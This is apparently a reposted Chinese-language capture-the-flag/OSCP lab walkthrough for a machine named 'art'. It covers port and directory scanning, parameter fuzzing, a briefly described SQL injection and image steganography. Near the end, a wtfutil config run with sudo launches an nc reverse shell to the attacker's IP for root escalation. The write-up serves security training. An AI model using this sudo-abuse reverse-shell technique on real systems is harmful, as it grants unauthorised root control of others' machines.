OSCP 靶场
靶场介绍
|
art |
easy |
fuzz 测试、sql注入、图片隐写、wtfutil 提权 |
信息收集
主机发现
端口扫描
└─# nmap -sV -A -p- -T4 192.168.31.86
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-13 11:46 EST
Nmap scan report for 192.168.31.86
Host is up (0.00047s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 45:42:0f:13:cc:8e:49:dd:ec:f5:bb:0f:58:f4:ef:47 (RSA)
| 256 12:2f:a3:63:c2:73:99:e3:f8:67:57:ab:29:52:aa:06 (ECDSA)
|_ 256 f8:79:7a:b1:a8:7e:e9:97:25:c3:40:4a:0c:2f:5e:69 (ED25519)
80/tcp open http nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:EE:DB:E9 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.47 ms 192.168.31.86
目录扫描
└─# gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.31.86/ -x html,php,txt -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.31.86/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,php,txt
[+] Expanded: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.31.86/index.php (Status: 200) [Size: 170]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
===============================================================根据提示对参数进行fuzz
┌──(root㉿kali)-[~/下载]
└─# ffuf -w /opt/SecLists/Discovery/Web-Content/raft-medium-words-lowercase.txt -u http://192.168.31.86/index.php?FUZZ=id -fs 170
/'___ /'___ /'___
/ __/ / __/ __ __ / __/
,__\ ,__/ / ,__
_/ _/ _ _/
_ _ ____/ _
/_/ /_/ /___/ /_/
v2.0.0-dev
________________________________________________
:: Method : GET
:: URL : http://192.168.31.86/index.php?FUZZ=id
:: Wordlist : FUZZ: /opt/SecLists/Discovery/Web-Content/raft-medium-words-lowercase.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
:: Filter : Response size: 170
________________________________________________
[Status: 200, Size: 70, Words: 11, Lines: 5, Duration: 7ms]
* FUZZ: tag
打开后是一张图片
权限获取
经过测试发现该页面存在sql 注入漏洞
http://192.168.31.86/index.php?tag=beauty
这里获取了一些账号密码和图片
使用账号密码爆破ssh,并没有成功
这里发现最后一张图片存在隐写
权限提升
sudo -l 发现wtfutil, 利用它进行提权到root
$ sudo -l
Matching Defaults entries for lion on art:
env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
User lion may run the following commands on art:
(ALL : ALL) NOPASSWD: /bin/wtfutil关于wtfuil: https://wtfutil.com/利用脚本如下
https://github.com/wtfutil/wtf/blob/master/_sample_configs/small_config.ymllion@art:/tmp$ cat config.yml
wtf:
grid:
columns: [40, 40]
rows: [4, 4]
refreshInterval: 1
mods:
disks:
type: cmdrunner
cmd: "nc"
args: ["-e", "/bin/bash", "192.168.31.181", "8888"]
enabled: true
position:
top: 3
left: 1
height: 1
width: 3
refreshInterval: 3
sudo /bin/wtfutil --config=/tmp/config.yml
End
“点赞、在看与分享都是莫大的支持”
原文始发于微信公众号(贝雷帽SEC):【OSCP】art
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论